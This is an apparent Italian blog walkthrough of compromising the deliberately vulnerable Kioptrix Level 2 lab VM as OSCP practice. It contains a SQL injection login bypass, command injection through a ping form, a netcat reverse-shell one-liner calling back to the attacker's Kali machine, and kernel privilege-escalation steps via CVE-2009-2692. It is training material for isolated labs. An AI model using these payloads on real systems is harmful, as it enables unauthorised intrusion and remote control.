Il secondo livello di Kioptrix non presenta particolari difficoltà. Fa parte di quelle macchine che sto usando per ricostruire l’autostima in vista della prossima OSCP.

Kioptrix Livello 2

Continuiamo la serie Kioptrix ed arriviamo al livello 2 disponibile qui.

Anche questa macchina virtuale è un box Linux su cui è montata una distribuzione CentOS obsoleta.

Setup dell’ambiente

Per iniziare, ho scaricato la versione corretta della macchina virtuale. La prima versione aveva infatti un bug nella web application. Ho lasciato configurato VirtualBox affinché esegua la mia Kali Linux e la macchina target in una rete ad hoc, isolata dal mondo esterno.

Questo si ottiene andando sulle preferenze di Virtual Box, selezionando Network ed il tab Host-only networks.

Ora che tutte le macchine, all’avvio, prenderanno un indirizzo sulla 192.168.56 possiamo partire.

La macchina 192.168.56.101 è una Kali Linux aggiornata e pronta all’uso. La macchina 192.168.56.103 è il nostro target.

Recon

Il primo passaggio è quello di enumerare i servizi in ascolto sulla macchina, per cercare di capire qualcosa in più.

# nmap -sV -O 192.168.56.103 -oA 192.168.56.103

# Nmap 7.50 scan initiated Mon Sep 11 17:28:58 2017 as: nmap -sV -O -oA 192.168.56.103 192.168.56.103
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00024s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:87:1E:A6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 11 17:29:14 2017 -- 1 IP address (1 host up) scanned in 16.05 seconds

E’ stato lanciato anche un dirb, che però non ha trovato cose interessanti.

Takeover narrative

Cercando con searchexploit, qualche exploit già pronto per le versioni rilevate abbiamo che per CUPS c’è qualcosa che possa darmi una shell, mentre per Apache solamente un DoS.

Navigando sulla porta 80, ci viene presentato una maschera di login di uno pseudo portale amministrativo.

La pagina di login era facilmente bypassabile usando la combinazione di credenziali admin:foo or ‘1’=’1.

Una volta autenticati, ci viene presentata una maschera che ci permette di eseguire un ping su un indirizzo ip passato come parametro. Questo genere di funzionalità si presta spesso a problematiche di command injection, quando l’input non è validato correttamente.

Infatti, usando il carattere ‘;’ come separatore, siamo in grado di far eseguire il comando id.

Una shell non privilegiata sulla macchina fa sempre comodo come primo risultato, che ne pensate?

Bene, su una finestra di terminale, ho lanciato netcat in ascolto sulla porta 443 e poi ho cercato di fare una callback alla mia macchina.

$ nc -lvnp 443

Perché uso la 443? Preferisco usare porte di servizi conosciuti, per evitare problemi con eventuali firewall. Servizi come 21, 53, 80, 443 in uscita da un indirizzo IP, possono essere dei buoni candidati.

Dopo un po’ di tentativi di indovinare il path di netcat, sulla macchina target, sono riuscito ad ottenere la mia shell col comando 192.168.56.101; /usr/local/bin/nc 192.168.56.101 443 -e /bin/sh

Da dentro, il primo obiettivo è capire bene di quale distribuzione si sta parlando e soprattutto quale la versione del kernel. Questo ci permette in seguito di cercare l’exploit migliore per elevare i privilegi della nostra shell.

$ uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

$ lsb_release -a
LSB Version:	:core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID:	CentOS
Description:	CentOS release 4.5 (Final)
Release:	4.5
Codename:	Final

Cerco quindi exploit per CentOS 4.5 e sono abbastanza fortunato.

Visto che le macchine, per come è stato creato il mini laboratorio, non escono su Internet direttamente, carico gli exploit nella mia /var/www/html e usando wget li prelevo dal target.

Provo prima l’exploit per il CVE-2009-2698 ma, una volta caricato fallisce. Niente shell di root al primo tentativo.

Provo quindi con l’exploit per il CVE-2009-2692 e questa volta, dopo aver compilato e lanciato l’exploit ho più fortuna: sono root.

Ho cercato un po’ in lungo ed in largo la flag di questa macchina ma non l’ho trovata. Probabilmente l’autore non l’ha messa.

Spinoff

Andando a vedere il codice sorgente di /var/www/html/index.php è possibile ottenere la password di MySQL dell’utente john.

E connettersi con successo al database MySQL.

Andando più a fondo è stato possibile trovare le hash delle password degli utenti del piccolo portale.

Ed infine è stato possibile risalire alla password di root su MySQL che è hiroshima.

Off by one

Anche questo livello 2 di Kioptrix non ha presentato grosse difficoltà. Resta il punto aperto del perché l’exploit per il CVE-2009-2698 non abbia funzionato, ma non ho investigato nel dettaglio, visto lo scopo di queste esercitazioni.

Il livello 3 di Kioptrix mi aspetta.

Enjoy it!